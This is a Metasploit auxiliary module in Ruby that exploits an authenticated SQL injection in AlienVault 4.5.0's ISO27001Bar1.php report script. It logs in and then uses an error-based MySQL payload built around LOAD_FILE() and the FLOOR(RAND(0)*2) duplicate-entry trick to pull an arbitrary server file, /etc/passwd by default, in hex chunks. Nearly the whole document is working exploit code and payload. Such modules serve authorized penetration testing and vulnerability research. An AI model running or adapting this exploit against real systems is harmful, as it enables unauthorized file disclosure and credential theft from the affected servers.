##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
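class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Number of hex digits pulled from the HEX()-encoded file per query: MID(..., offset, 50)
  # yields 50 hex characters, i.e. 25 bytes of file content, per HTTP request.
  CHUNK_HEX_LEN = 50

  def initialize(info = {})
    super(update_info(info,
      'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
      'Description' => %q{
        AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
        generation PHP file. This module exploits this to read an arbitrary file from
        the file system. Any authenticated user is able to exploit it, as administrator
        privileges aren't required.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
      ],
      'References' => [
        ['EDB', '32644']
      ],
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform' => ['linux'],
      'Privileged' => false,
      'DisclosureDate' => '2014-03-30'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
        OptString.new('USERNAME', [ true, 'Single username' ]),
        OptString.new('PASSWORD', [ true, 'Single password' ]),
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
      ])
  end

  # Entry point: obtain a session, authenticate with USERNAME/PASSWORD, then pull FILEPATH
  # through the injection 25 bytes at a time and save it with store_loot.
  # Every failure path prints its own error and returns early without storing anything.
  def run
    cookie = session_cookie
    return if cookie.nil?

    cookie = authenticate(cookie)
    return if cookie.nil?

    contents = read_remote_file(cookie)
    return if contents.nil?

    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], contents, datastore['FILEPATH'])
    print_good("File stored at path: " + path)
  end

  # GET the login page so the application hands out an (unauthenticated) session cookie.
  # Returns the cookie string, or nil after printing an error.
  def session_cookie
    print_status("Get a valid session cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
    })

    unless res && res.code == 200
      print_error("Server did not respond in an expected way")
      return nil
    end

    cookie = res.get_cookies
    if cookie.blank?
      print_error("Could not retrieve a cookie")
      return nil
    end

    cookie
  end

  # POST the credentials to login.php using the pre-auth session cookie.
  # A successful login is a 302 redirect to the application root; the cookie set on that
  # response is the authenticated one and is returned. Returns nil after printing an error
  # on any other outcome.
  def authenticate(cookie)
    post = {
      'embed' => '',
      'bookmark_string' => '',
      'user' => datastore['USERNAME'],
      # The login form carries the password both in the clear and base64-encoded.
      'passu' => datastore['PASSWORD'],
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
    }

    print_status("Login...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
      'method' => 'POST',
      'vars_post' => post,
      'cookie' => cookie
    })

    unless res && res.code == 302
      print_error("Server did not respond in an expected way")
      return nil
    end

    # Anything other than a redirect to <TARGETURI>/ossim/ is treated as a failed login.
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
      print_error("Authentication failed")
      return nil
    end

    auth_cookie = res.get_cookies
    if auth_cookie.blank?
      print_error("Could not retrieve the authenticated cookie")
      return nil
    end

    auth_cookie
  end

  # Read FILEPATH chunk by chunk through the injection and return its raw contents.
  # Returns nil (after printing an error) if a request fails or if the database could not
  # read the file. The path is hex-encoded so it can be passed to LOAD_FILE() as a 0x...
  # literal without quotes.
  def read_remote_file(cookie)
    filename = datastore['FILEPATH'].unpack('H*').first
    # Random alphabetic markers delimit the leaked value inside the error page. Being
    # purely [A-Za-z] they are safe to interpolate into the extraction regex unescaped.
    left_marker = Rex::Text.rand_text_alpha(6)
    right_marker = Rex::Text.rand_text_alpha(6)
    full = ''

    print_status("Exploiting SQLi...")

    chunk_index = 0
    loop do
      chunk = sqli(left_marker, right_marker, chunk_index, cookie, filename)
      return nil if chunk.nil?
      break if chunk.empty?

      # The payload wraps LOAD_FILE() in IFNULL(..., 0x20), so a NULL result (file missing,
      # not readable by the MySQL process, or blocked by secure_file_priv) comes back as a
      # lone space instead of hex. Report it rather than storing a bogus NUL byte.
      if chunk_index.zero? && chunk == ' '
        print_error("LOAD_FILE() returned NULL for #{datastore['FILEPATH']} (file missing, unreadable by the database user, or blocked by secure_file_priv)")
        return nil
      end

      decoded = [chunk].pack('H*')
      full << decoded
      vprint_status(decoded)

      chunk_index += 1
    end

    full
  end

  # Send one injected request and return the hex digits found between the markers.
  #
  # The injection point is the date_from parameter of ISO27001Bar1.php. The payload closes
  # the quoted date, appends an error-based subquery, and re-balances the quote with
  # AND 'xnDa'='xnDa. The subquery uses the classic duplicate-entry technique:
  # FLOOR(RAND(0)*2) as a GROUP BY key over INFORMATION_SCHEMA.CHARACTER_SETS makes MySQL
  # raise a "Duplicate entry" error whose message contains the CONCAT()ed value, i.e.
  # left_marker + 50 hex digits of the file (starting at offset 50*i+1) + right_marker.
  #
  # @param left_marker  [String] alphabetic prefix marking the start of the leaked value
  # @param right_marker [String] alphabetic suffix marking the end of the leaked value
  # @param i            [Integer] zero-based chunk index; selects hex digits 50*i+1 .. 50*i+50
  # @param cookie       [String] authenticated session cookie
  # @param filename     [String] hex-encoded (no 0x prefix) path passed to LOAD_FILE()
  # @return [String, nil] the captured chunk ('' once the file is exhausted), or nil after
  #   printing an error when the response does not contain the markers
  def sqli(left_marker, right_marker, i, cookie, filename)
    offset = (CHUNK_HEX_LEN * i) + 1
    pay = [
      "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack('H*')[0]},",
      "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),",
      "0x20)),#{offset},#{CHUNK_HEX_LEN})),0x#{right_marker.unpack('H*')[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS",
      " GROUP BY x)a) AND 'xnDa'='xnDa"
    ].join

    get = {
      'date_from' => pay,
      'date_to' => '2014-03-30'
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
      'cookie' => cookie,
      'vars_get' => get
    })

    match = res && res.body && res.body.match(/#{left_marker}(.*)#{right_marker}/)
    return match[1] if match

    print_error("Server did not respond in an expected way")
    nil
  end
end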